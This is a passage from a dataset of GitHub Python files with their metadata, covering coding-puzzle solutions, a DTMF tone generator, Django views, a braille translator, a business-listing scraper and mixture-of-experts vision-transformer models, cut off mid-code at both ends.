---------------------------------------------------------------------------------------------------------------------------\n def compute_input_statistics(self):\n\n self.stat_input = {}\n self.stat_input['min'] = self.norm_input.min(axis = 0)\n self.stat_input['max'] = self.norm_input.max(axis = 0)\n self.stat_input['mean'] = self.norm_input.mean(axis = 0)\n self.stat_input['std'] = self.norm_input.std(axis = 0) \n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def compute_output_statistics(self):\n\n self.stat_output = {}\n self.stat_output['min'] = self.norm_output.min(axis = 0)\n self.stat_output['max'] = self.norm_output.max(axis = 0)\n self.stat_output['mean'] = self.norm_output.mean(axis = 0)\n self.stat_output['std'] = self.norm_output.std(axis = 0) \n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def read_output_statistics(self, PathToRead=None):\n\n if (PathToRead):\n DataNew = pd.read_csv(PathToRead + \"/Data/stats_output.csv\")\n else:\n DataNew = pd.read_csv(self.path_to_run_fld + \"/Data/stats_output.csv\")\n\n self.stat_output = {}\n self.stat_output['mean'] = DataNew['output_mean']\n self.stat_output['std'] = DataNew['output_std']\n self.stat_output['min'] = DataNew['output_min']\n self.stat_output['max'] = DataNew['output_max']\n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def res_fn(self, net):\n '''Residual loss function'''\n\n self.n_inputs = net.n_inputs\n self.n_outputs = net.n_outputs\n\n def residual(inputs, training=True):\n return None\n \n return residual\n\n # ---------------------------------------------------------------------------------------------------------------------------\n","repo_name":"simoneventuri/ROMNet_","sub_path":"romnet/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"46867982312","text":"# Question Link - https://leetcode.com/problems/coin-change-2/\n\n# Solution - \n\nclass Solution:\n # memoized\n def helper(self, target, coins, start, dt):\n if target == 0 : return 1\n if target < 0 : return 0\n if start == len(coins) : return 0\n if (target, start) in dt:\n return dt[(target, start)]\n firstWay = self.helper(target-coins[start], coins, start, dt);\n secondWay = self.helper(target, coins, start+1, dt);\n dt[(target, start)] = firstWay + secondWay\n return firstWay + secondWay\n def change(self, amount: int, coins: List[int]) -> int:\n return self.helper(amount, coins, 0, {});\n \n","repo_name":"codethat-vivek/Code","sub_path":"LeetCode/Coin Change 2.py","file_name":"Coin Change 2.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15881361133","text":"\n#importe as bibliotecas\nfrom email.mime import audio\nfrom pydub import AudioSegment\nfrom re import X\nimport wavio\nfrom suaBibSignal import *\nfrom math import *\nimport numpy as np\nimport sounddevice as sd\nimport matplotlib.pyplot as plt\n\n#funções a serem utilizadas\n# def signal_handler(signal, frame):\n# print('You pressed Ctrl+C!')\n# sys.exit(0)\n\n#converte intensidade em Db, caso queiram ...\ndef todB(s):\n sdB = 10*np.log10(s)\n return(sdB)\n\n\n\n\ndef main():\n \n \n #********************************************instruções*********************************************** \n # seu objetivo aqui é gerar duas senoides. Cada uma com frequencia corresposndente à tecla pressionada\n # então inicialmente peça ao usuário para digitar uma tecla do teclado numérico DTMF\n # agora, voce tem que gerar, por alguns segundos, suficiente para a outra aplicação gravar o audio, duas senoides com as frequencias corresposndentes à tecla pressionada, segundo a tabela DTMF\n # Essas senoides tem que ter taxa de amostragem de 44100 amostras por segundo, entao voce tera que gerar uma lista de tempo correspondente a isso e entao gerar as senoides\n # Lembre-se que a senoide pode ser construída com A*sin(2*pi*f*t)\n # O tamanho da lista tempo estará associada à duração do som. A intensidade é controlada pela constante A (amplitude da senoide). Construa com amplitude 1.\n # Some as senoides. A soma será o sinal a ser emitido.\n # Utilize a funcao da biblioteca sounddevice para reproduzir o som. Entenda seus argumento.\n # Grave o som com seu celular ou qualquer outro microfone. Cuidado, algumas placas de som não gravam sons gerados por elas mesmas. (Isso evita microfonia).\n \n # construa o gráfico do sinal emitido e o gráfico da transformada de Fourier. Cuidado. Como as frequencias sao relativamente altas, voce deve plotar apenas alguns pontos (alguns periodos) para conseguirmos ver o sinal\n \n\n print(\"Inicializando encoder\")\n numero = input(\"Digite um número de 0 a 9: \")\n\n print(\"Aguardando usuário\")\n def calculoSenoide(numero):\n if numero == '1':\n f1 = 697\n f2 = 1209\n elif numero == '2':\n f1 = 697\n f2 = 1336\n elif numero == '3':\n f1 = 697\n f2 = 1477\n elif numero == '4':\n f1 = 770\n f2 = 1209\n elif numero == '5':\n f1 = 770\n f2 = 1336\n elif numero == '6':\n f1 = 770\n f2 = 1477\n elif numero == '7':\n f1 = 852\n f2 = 1209\n elif numero == '8':\n f1 = 852\n f2 = 1336\n elif numero == '9':\n f1 = 852\n f2 = 1477\n elif numero == '0':\n f1 = 941\n f2 = 1336\n else:\n print(\"Número inválido\")\n return\n return [f1, f2]\n\n\n\n sinal = calculoSenoide(numero)\n fs = 44100\n t = 3\n t = np.arange(0, t, 1/fs)\n\n #Cálculo das senoides\n sinal1 = np.sin(2*pi*sinal[0]*t)\n sinal2 = np.sin(2*pi*sinal[1]*t)\n sinal = sinal1 + sinal2\n\n print(\"Gerando Tons base\")\n print(\"Executando as senoides (emitindo o som)\")\n #Tocando o sinal\n sd.play(sinal, fs)\n sd.wait()\n wavio.write(\"sinal.wav\", sinal, fs, sampwidth=3)\n\n #Plot do sinal\n plt.plot(t, sinal)\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Gráfico das duas frequências somadas no tempo')\n plt.axis([0, 0.01, -2, 2])\n plt.show()\n\n\n #Plot da FFT\n sinal1 = signalMeu()\n sinal1.plotFFT(sinal, fs)\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Gráfico da frequências do sinal emitido (COM FOURIER) no tempo')\n plt.show()\n # print(.format(NUM))\n # sd.play(tone, fs)\n # # Exibe gráficos\n # plt.show()\n # # aguarda fim do audio\n # sd.wait()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"caiotravain/Camada_Fisica","sub_path":"Projeto 7/encode_versaoAlunos.py","file_name":"encode_versaoAlunos.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3494083220","text":"from django.shortcuts import render\nfrom django.views.generic import View\n\n# Create your views here.\n\nclass LoginView(View):\n\tdef get(self, request):\n\t\ttemplate_name = \"cuentas/login.html\"\n\t\treturn render(request, template_name)\n\nclass homeView(View):\n\tdef get(self, request):\n\t\thome_name = \"cuentas/home.html\"\n\t\treturn render(request, home_name)\n\n\n","repo_name":"MarisolenlaWeb/Red_Social","sub_path":"cuentas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11953358501","text":"test_case = int(input())\nst = \"welcome to code jam\"\nfor i in range(test_case):\n string = [c for c in st]\n dp = [0]*(len(string)+1)\n for c in input():\n if c == 'w':\n dp[1]+=1\n for index,cc in enumerate(string):\n if cc==c:\n dp[index+1]+=dp[index]\n dp[len(string)] = dp[len(string)] % 10000\n print(\"Case #{}: {}\".format(i+1,str(dp[len(string)]).zfill(4)))","repo_name":"Hansel34/CPC","sub_path":"Kattis/Python/welcomeeasy.py","file_name":"welcomeeasy.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73955095602","text":"#!/usr/bin/env python3\n\nage=int(input(\"Please let me know how old are you:\"))\nname=str(input(\"Please inout your name:\"))\ncity=str(input(\"Please let me know which city are you in:\"))\n\nif age>18:\n print(\"You are an adult named\",name,\"lives in\", city)\nelse:\n print(\"You are a teenager named\",name,\"lives in\",city)\n\n","repo_name":"danxie1999/python_test","sub_path":"age_v2.py","file_name":"age_v2.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12601828","text":"# Translate alphabet based text to braille.\nimport mapAlphaToBraille, mapBrailleToAlpha\n\nCAPITAL = chr(10272) # ⠠\nNUMBER = chr(10300) # ⠼\nUNRECOGNIZED = '?'\n\n# There is no braille symbol for a generic quote (\").\n# There is only open quotation (“) and closed quotation (”).\n# Therefore we must keep track of what the last quotation was\n# so that we may convert the generic quotation to a specific one.\nopen_quotes = True\n\n\ndef extract_words(string):\n # Split up a sentence based on whitespace (\" \") and new line (\"\\n\") chars.\n words = string.split(\" \")\n result = []\n for word in words:\n temp = word.split(\"\\n\")\n for item in temp:\n result.append(item)\n return result\n\n\ndef is_braille(char):\n # Return true if a char is braille.\n if len(char) > 1:\n return False\n return char in mapBrailleToAlpha.letters \\\n or char in mapBrailleToAlpha.numbers \\\n or char in mapBrailleToAlpha.punctuation \\\n or char in mapBrailleToAlpha.contractions \\\n or char == CAPITAL \\\n or char == NUMBER\n\n\ndef trim(word):\n # Remove punctuation around a word. Example: cat.\" becomes cat\n while len(word) is not 0 and not word[0].isalnum():\n word = word[1:]\n while len(word) is not 0 and not word[-1].isalnum():\n word = word[:-1]\n return word\n\n\ndef numbers_handler(word):\n # Replace each group of numbers in a word to their respective braille representation.\n if word == \"\":\n return word\n result = word[0]\n if word[0].isdigit():\n result = NUMBER + mapAlphaToBraille.numbers.get(word[0])\n for i in range(1, len(word)):\n if word[i].isdigit() and word[i-1].isdigit():\n result += mapAlphaToBraille.numbers.get(word[i])\n elif word[i].isdigit():\n result += NUMBER + mapAlphaToBraille.numbers.get(word[i])\n else:\n result += word[i]\n return result\n\n\ndef capital_letters_handler(word):\n # Put the capital escape code before each capital letter.\n if word == \"\":\n return word\n result = \"\"\n for char in word:\n if char.isupper():\n result += CAPITAL + char.lower()\n else:\n result += char.lower()\n return result\n\n\ndef find_utf_code(char):\n # Find the UTF code of a particular character. Used what an unidentified char is found.\n if len(char) != 1:\n return -1\n for i in range(0, 55000):\n if char == chr(i):\n return i\n\n\ndef char_to_braille(char):\n # Convert an alphabetic char to braille.\n if is_braille(char):\n return char\n elif char == \"\\n\":\n return \"\\n\"\n elif char == \"\\\"\":\n global open_quotes\n if open_quotes:\n open_quotes = not open_quotes\n return mapAlphaToBraille.punctuation.get(\"“\")\n else:\n open_quotes = not open_quotes\n return mapAlphaToBraille.punctuation.get(\"”\")\n elif char in mapAlphaToBraille.letters and char.isupper():\n return CAPITAL + mapAlphaToBraille.letters.get(char)\n elif char in mapAlphaToBraille.letters:\n return mapAlphaToBraille.letters.get(char)\n elif char in mapAlphaToBraille.punctuation:\n return mapAlphaToBraille.punctuation.get(char)\n else:\n print(\"Unrecognized Symbol:\", char, \"with UTF code:\", find_utf_code(char))\n return UNRECOGNIZED\n\n\ndef word_to_braille(word):\n # Convert an alphabetic word to braille.\n if word in mapAlphaToBraille.contractions:\n return mapAlphaToBraille.contractions.get(word)\n else:\n result = \"\"\n for char in word:\n result += char_to_braille(char)\n return result\n\n\ndef build_braille_word(trimmed_word, shavings, index, braille):\n # Translate a trimmed word to braille then re-attach the shavings.\n if shavings == \"\":\n braille += word_to_braille(trimmed_word)\n else:\n for i in range(0, len(shavings)):\n if i == index and trimmed_word is not \"\":\n braille += word_to_braille(trimmed_word)\n braille += word_to_braille(shavings[i])\n if index == len(shavings): # If the shavings are all at the beginning.\n braille += word_to_braille(trimmed_word)\n return braille\n\n\ndef translate(string):\n # Convert alphabetic text to braille.\n braille = \"\"\n words = extract_words(string)\n for word in words:\n word = numbers_handler(word)\n word = capital_letters_handler(word)\n trimmed_word = trim(word) # Remove punctuation (ex: change dog?\" to dog)\n untrimmed_word = word\n index = untrimmed_word.find(trimmed_word)\n shavings = untrimmed_word.replace(trimmed_word, \"\")\n braille = build_braille_word(trimmed_word, shavings, index, braille) + \" \"\n return braille[:-1] # Remove the final space that was added.\n\n'''\nThe Algorithm for Translating Alphabet Based Text to Grade 2 Braille:\n1. Split up the text into words by dividing them based on whitespace characters.\n - Whitespace includes spaces (' ') and new lines ('\\n')\n2. For each word, handle the numbers first.\n - Numbers in braille use the same symbols as the first 10 letters of the alphabet.\n - The number '7' and the letter 'g' are both represented by '⠛'.\n - To differentiate between numbers and letters, an escape code (⠼) is placed before groups of numbers.\n - Therefore '7' is actually '⠼⠛' whereas 'g' is only '⠛'.\n - In this step, only the numbers are dealt with, so there will be a mix of both braille and Alphabet symbols.\n - Example: \"123-456-JUNK\" becomes \"⠼⠁⠃⠉-⠼⠙⠑⠋-JUNK\"\n3. Handle the capitals.\n - Similarly to numbers in braille, capital letters need an escape code (⠠).\n - The escape code (⠠) is added to the beginning of each capital letter and the letter is changed to lowercase.\n - Example 1: \"⠼⠁⠃⠉-⠼⠙⠑⠋-JUNK\" becomes \"⠼⠁⠃⠉-⠼⠙⠑⠋-⠠j⠠u⠠n⠠k\". The dashes still remain.\n - Example 2: \"Sweet\" becomes \"⠠sweet\". The non-capital letters remain untouched.\n4. Trim the word.\n - Sometimes the words extracted contain punctuation attached to them such as commas or brackets.\n - Words need to be trimmed so that they can be converted to contractions.\n - Example: The word \"the\" is represented by a single braille symbol (⠮).\n - If the word \"the\" has punctuation around it (\"the!\") then it will not be interpreted correctly.\n - This is also why capitals are converted to lowercase in step 3 because \"The\" would not work either.\n - The characters that are trimmed off are called \"shavings\".\n - Example: In the word \"!where?\", the shavings are \"!?\" and the trimmed word is \"where\".\n5. Build the translation.\n a) Check to see if the trimmed word can be contracted.\n - This includes common words like \"the\", \"in\", \"you\" etc...\n b) Translate the remaining characters that are still alphabetic.\n c) Translate the shavings (this will mostly just be punctuation).\n - Exceptions to be mindful of:\n - There is no braille symbol for a generic quote (\")\n - There is only open quotation (“) and closed quotation (”).\n - Therefore we must keep track of what the last quotation was to convert it correctly.\n'''","repo_name":"LazoCoder/Braille-Translator","sub_path":"alphaToBraille.py","file_name":"alphaToBraille.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"43030011210","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom csv import writer\r\n\r\nurl = \"https://www.yellowpages.ca/search/si/1/Restaurants/Toronto+ON\"\r\nurl1 = \"https://www.yellowpages.ca/search/si/1/Stock+Market/Toronto+ON\"\r\n\r\npage1 = requests.get(url1)\r\n\r\nsoup = BeautifulSoup(page1.content, 'html.parser')\r\n\r\nlists1 = soup.find_all('div', class_=\"listing_right_section\")\r\n\r\nwith open('StockMarket.csv', 'w', encoding='utf8', newline='') as f:\r\n thewriter = writer(f)\r\n header = ['BusinessName', 'PhoneNumber', 'Address', 'Title']\r\n thewriter.writerow(header)\r\n\r\n for list1 in lists1:\r\n businessname = list1.find('a', class_=\"listing__name--link listing__link jsListingName\").text.replace('\\n', '')\r\n PhoneNumber = list1.find('ul', class_=\"mlr__submenu\").text.replace('\\n', '')\r\n address = list1.find('span', class_=\"listing__address--full\").text.replace('\\n', '')\r\n title = list1.find('div', class_=\"listing__headings__roots\").text.replace('\\n', '')\r\n\r\n info1 = [businessname, PhoneNumber, address, title]\r\n thewriter.writerow(info1)\r\n\r\n\r\n\r\n","repo_name":"JavaXV/python.scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23410055126","text":"from functools import partial\n\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom einops import rearrange\nfrom einops.layers.torch import Rearrange\nfrom torch import nn\n\nfrom src.models.moe import SMoE\nfrom src.models.vit_small import MoEViTLightning, ViTLightning\nfrom src.models.xcit import MoEXCiTLightning, XCiTLightning\nfrom src.utils.metrics import cls_acc\n\n# helpers\n\n\ndef pair(t):\n return t if isinstance(t, tuple) else (t, t)\n\n\ndef posemb_sincos_2d(patches, temperature=10000, dtype=torch.float32):\n _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype\n\n y, x = torch.meshgrid(\n torch.arange(h, device=device), torch.arange(w, device=device), indexing=\"ij\"\n )\n assert (dim % 4) == 0, \"feature dimension must be multiple of 4 for sincos emb\"\n omega = torch.arange(dim // 4, device=device) / (dim // 4 - 1)\n omega = 1.0 / (temperature ** omega)\n\n y = y.flatten()[:, None] * omega[None, :]\n x = x.flatten()[:, None] * omega[None, :]\n pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1)\n return pe.type(dtype)\n\n\n# classes\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, hidden_dim):\n super().__init__()\n self.net = nn.Sequential(\n nn.LayerNorm(dim),\n nn.Linear(dim, hidden_dim),\n nn.GELU(),\n nn.Linear(hidden_dim, dim),\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nclass NoisyTopK(nn.Module):\n def __init__(self, k, sigma):\n super().__init__()\n self.k = k\n self.sigma = sigma\n\n def forward(self, gate_out):\n \"\"\"\n gate_out: shape: (b, e)\n topk_out: shape: (b, k)\n \"\"\"\n noise = torch.randn_like(gate_out, device=\"cuda\") * self.sigma\n gate_out = gate_out + noise\n topk_out, indices = torch.topk(gate_out, self.k, dim=-1) # shape: b, k\n return topk_out, indices\n\n\nclass ModuleListWrapper(nn.ModuleList):\n def forward(self, x):\n return [module(x) for module in self]\n\n\nclass MoE_MLP(nn.Module):\n def __init__(self, gate_dim, dim, hidden_dim, num_experts, k, sigma=None):\n super().__init__()\n self.num_experts = num_experts\n self.k = k\n self.experts = ModuleListWrapper(\n [FeedForward(dim, hidden_dim) for _ in range(num_experts)]\n )\n self.gate = nn.Linear(gate_dim, num_experts, bias=False)\n if sigma is None:\n sigma = 1.0 / num_experts\n self.noisy_topk = NoisyTopK(k, sigma)\n\n def forward(self, h):\n \"\"\"\n h: shape: (b, dim_head, dim) = (b, dh, d)\n out: shape: (b, dim_head, dim) = (b, dh, d)\n \"\"\"\n gate_out = torch.softmax(\n self.gate(rearrange(h, \"b dh d -> b (dh d)\")), dim=-1\n ) # shape (b, e)\n gate_out, indices = self.noisy_topk(gate_out) # shape (b, k)\n gate_out = rearrange(gate_out, \"b k -> k b 1 1\")\n b, dh, d = h.shape\n topk_out = torch.zeros(self.k, b, dh, d, device=\"cuda\")\n for i in range(b):\n for k in range(self.k):\n topk_out[k, i, :, :] = self.experts[indices[i, k]](h[i])\n out = torch.sum(gate_out * topk_out, dim=0) # shape (b, dh, d)\n return out\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads=8, dim_head=64):\n super().__init__()\n inner_dim = dim_head * heads\n self.heads = heads\n self.scale = dim_head ** -0.5\n self.norm = nn.LayerNorm(dim)\n\n self.attend = nn.Softmax(dim=-1)\n\n self.to_qkv = nn.Linear(dim, inner_dim * 3, bias=False)\n self.to_out = nn.Linear(inner_dim, dim, bias=False)\n\n def forward(self, x):\n x = self.norm(x)\n qkv = self.to_qkv(x).chunk(3, dim=-1)\n q, k, v = map(lambda t: rearrange(t, \"b n (h d) -> b h n d\", h=self.heads), qkv)\n\n dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale\n\n attn = self.attend(dots)\n\n out = torch.matmul(attn, v)\n out = rearrange(out, \"b h n d -> b n (h d)\")\n return self.to_out(out)\n\n\nclass Transformer(nn.Module):\n def __init__(self, dim, depth, heads, dim_head, mlp_dim):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(\n nn.ModuleList(\n [\n Attention(dim, heads=heads, dim_head=dim_head),\n FeedForward(dim, mlp_dim),\n ]\n )\n )\n\n def forward(self, x):\n for attn, ff in self.layers:\n x = attn(x) + x\n x = ff(x) + x\n return x\n\n\nclass SimpleViT(pl.LightningModule):\n def __init__(\n self,\n *,\n image_size,\n patch_size,\n num_classes,\n dim,\n depth,\n heads,\n mlp_dim,\n channels=3,\n dim_head=64,\n optimizer,\n lr\n ):\n super().__init__()\n self.optimizer = optimizer\n self.lr = lr\n image_height, image_width = pair(image_size)\n patch_height, patch_width = pair(patch_size)\n\n assert (\n image_height % patch_height == 0 and image_width % patch_width == 0\n ), \"Image dimensions must be divisible by the patch size.\"\n\n num_patches = (image_height // patch_height) * (image_width // patch_width)\n patch_dim = channels * patch_height * patch_width\n\n self.to_patch_embedding = nn.Sequential(\n Rearrange(\n \"b c (h p1) (w p2) -> b h w (p1 p2 c)\", p1=patch_height, p2=patch_width\n ),\n nn.Linear(patch_dim, dim),\n )\n\n self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim)\n\n self.to_latent = nn.Identity()\n self.linear_head = nn.Sequential(nn.LayerNorm(dim), nn.Linear(dim, num_classes))\n\n def forward(self, img):\n *_, h, w, dtype = *img.shape, img.dtype\n\n x = self.to_patch_embedding(img)\n pe = posemb_sincos_2d(x)\n x = rearrange(x, \"b ... d -> b (...) d\") + pe\n\n x = self.transformer(x)\n x = x.mean(dim=1)\n\n x = self.to_latent(x)\n return self.linear_head(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n loss = F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"train_loss\": loss.item(), \"train_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n loss = F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"val_loss\": loss.item(), \"val_acc\": acc}, on_epoch=True, prog_bar=True\n )\n return loss\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n loss = F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"test_loss\": loss.item(), \"test_acc\": acc}, on_epoch=True, prog_bar=True\n )\n return loss\n\n def configure_optimizers(self):\n if self.optimizer == \"adam\":\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n elif self.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(self.parameters(), lr=self.lr)\n else:\n raise ValueError(\"Optimizer not supported\")\n return optimizer\n\n\nclass MoETransformer(nn.Module):\n def __init__(self, dim, depth, heads, dim_head, mlp_dim, num_experts=4, k=2):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(\n nn.ModuleList(\n [\n Attention(dim, heads=heads, dim_head=dim_head),\n MoE_MLP(dim * dim_head, dim, mlp_dim, num_experts, k),\n ]\n )\n )\n\n def forward(self, x):\n for attn, ff in self.layers:\n x = attn(x) + x\n x = ff(x) + x\n return x\n\n\nclass SMoETransformer(nn.Module):\n def __init__(\n self,\n dim,\n depth,\n heads,\n dim_head,\n mlp_dim,\n num_experts,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n ): # , num_experts = 4, k = 2):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(\n nn.ModuleList(\n [\n Attention(dim, heads=heads, dim_head=dim_head),\n SMoE(\n num_experts,\n dim,\n dim,\n mlp_dim,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n ), # add pre layer norm?\n ]\n )\n )\n\n def forward(self, x):\n moe_losses = 0\n for attn, ff in self.layers:\n x = attn(x) + x\n ff_out, moe_loss = ff(x)\n moe_losses += moe_loss\n x = ff_out + x\n return x, moe_losses\n\n\nclass SimpleMoEViT(nn.Module):\n def __init__(\n self,\n *,\n image_size,\n patch_size,\n num_classes,\n dim,\n depth,\n heads,\n mlp_dim,\n channels=3,\n dim_head=64,\n num_experts=4,\n k=2\n ):\n super().__init__()\n image_height, image_width = pair(image_size)\n patch_height, patch_width = pair(patch_size)\n\n assert (\n image_height % patch_height == 0 and image_width % patch_width == 0\n ), \"Image dimensions must be divisible by the patch size.\"\n\n num_patches = (image_height // patch_height) * (image_width // patch_width)\n patch_dim = channels * patch_height * patch_width\n\n self.to_patch_embedding = nn.Sequential(\n Rearrange(\n \"b c (h p1) (w p2) -> b h w (p1 p2 c)\", p1=patch_height, p2=patch_width\n ),\n nn.Linear(patch_dim, dim),\n )\n\n self.transformer = MoETransformer(\n dim, depth, heads, dim_head, mlp_dim, num_experts, k\n )\n\n self.to_latent = nn.Identity()\n self.linear_head = nn.Sequential(nn.LayerNorm(dim), nn.Linear(dim, num_classes))\n\n def forward(self, img):\n *_, h, w, dtype = *img.shape, img.dtype\n\n x = self.to_patch_embedding(img)\n pe = posemb_sincos_2d(x)\n x = rearrange(x, \"b ... d -> b (...) d\") + pe\n\n x = self.transformer(x)\n x = x.mean(dim=1)\n\n x = self.to_latent(x)\n return self.linear_head(x)\n\n\nclass SMoEViT(pl.LightningModule):\n def __init__(\n self,\n *,\n image_size,\n patch_size,\n num_classes,\n dim,\n depth,\n heads,\n mlp_dim,\n num_experts,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n channels=3,\n dim_head=64,\n optimizer=None,\n lr=None\n ):\n super().__init__()\n self.optimizer = optimizer\n self.lr = lr\n\n image_height, image_width = pair(image_size)\n patch_height, patch_width = pair(patch_size)\n\n assert (\n image_height % patch_height == 0 and image_width % patch_width == 0\n ), \"Image dimensions must be divisible by the patch size.\"\n\n num_patches = (image_height // patch_height) * (image_width // patch_width)\n patch_dim = channels * patch_height * patch_width\n\n self.to_patch_embedding = nn.Sequential(\n Rearrange(\n \"b c (h p1) (w p2) -> b h w (p1 p2 c)\", p1=patch_height, p2=patch_width\n ),\n nn.Linear(patch_dim, dim),\n )\n\n self.transformer = SMoETransformer(\n dim,\n depth,\n heads,\n dim_head,\n mlp_dim,\n num_experts,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n )\n\n self.to_latent = nn.Identity()\n self.linear_head = nn.Sequential(nn.LayerNorm(dim), nn.Linear(dim, num_classes))\n\n def forward(self, img):\n *_, h, w, dtype = *img.shape, img.dtype\n\n x = self.to_patch_embedding(img)\n pe = posemb_sincos_2d(x)\n x = rearrange(x, \"b ... d -> b (...) d\") + pe\n\n x, moe_loss = self.transformer(x)\n x = x.mean(dim=1)\n\n x = self.to_latent(x)\n return self.linear_head(x), moe_loss\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits, loss = self(x)\n loss = 0.5 * loss + 0.5 * F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"train_loss\": loss.item(), \"train_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits, loss = self(x)\n loss = 0.5 * loss + 0.5 * F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"val_loss\": loss.item(), \"val_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits, loss = self(x)\n loss = 0.5 * loss + 0.5 * F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"test_loss\": loss.item(), \"test_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def configure_optimizers(self):\n if self.optimizer == \"adam\":\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n elif self.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(self.parameters(), lr=self.lr)\n else:\n raise ValueError(\"Optimizer not supported\")\n return optimizer\n\n\ndef init_vit_model(cfg):\n if cfg[\"model\"] == \"vit\":\n vit_model = SimpleViT(\n image_size=cfg[\"image_size\"],\n patch_size=cfg[\"patch_size\"],\n num_classes=cfg[\"nb_classes\"],\n dim=cfg[\"dim\"],\n depth=cfg[\"depth\"],\n heads=cfg[\"heads\"],\n mlp_dim=cfg[\"mlp_dim\"],\n optimizer=cfg[\"opt\"],\n lr=cfg[\"lr\"],\n )\n\n elif cfg[\"model\"] == \"moe-vit\":\n vit_model = SMoEViT(\n image_size=cfg[\"image_size\"],\n patch_size=cfg[\"patch_size\"],\n num_classes=cfg[\"nb_classes\"], # // cfg['nb_tasks'],\n dim=cfg[\"dim\"],\n depth=cfg[\"depth\"],\n heads=cfg[\"heads\"],\n mlp_dim=cfg[\"mlp_dim\"],\n num_experts=cfg[\"nb_experts\"],\n k=cfg[\"k\"],\n noisy_gating=cfg[\"noisy_gating\"],\n dropout=cfg[\"dropout\"],\n hidden_act=cfg[\"hidden_act\"],\n optimizer=cfg[\"opt\"],\n lr=cfg[\"lr\"],\n )\n\n elif cfg[\"model\"] in (\"vit-s, moe-vit-s\"):\n vit_args = dict(\n img_size=[cfg[\"image_size\"]],\n in_chans=cfg[\"in_chans\"],\n checkpoint=cfg[\"checkpoint\"],\n patch_size=cfg[\"patch_size\"],\n embed_dim=384,\n depth=cfg[\"depth\"],\n num_heads=cfg[\"heads\"],\n mlp_ratio=4,\n qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6),\n optimizer=cfg[\"opt\"],\n lr=cfg[\"lr\"],\n momentum=cfg[\"momentum\"],\n weight_decay=cfg[\"weight_decay\"],\n compute_fisher=cfg[\"compute_fisher\"],\n ewc_lambd=cfg[\"ewc_lambd\"],\n online_ewc=cfg[\"online_ewc\"],\n ewc_gamma=cfg[\"ewc_gamma\"],\n dropout=cfg[\"dropout\"],\n )\n clf_args = dict(\n num_classes=cfg[\"nb_classes\"],\n hidden_dim=cfg[\"clf_hidden_dim\"],\n clf_head=cfg[\"clf_head\"],\n individual_clf=cfg[\"individual_clf\"],\n nb_classes_per_task=cfg[\"nb_classes_per_task\"],\n distillation_tau=cfg[\"distillation_tau\"],\n 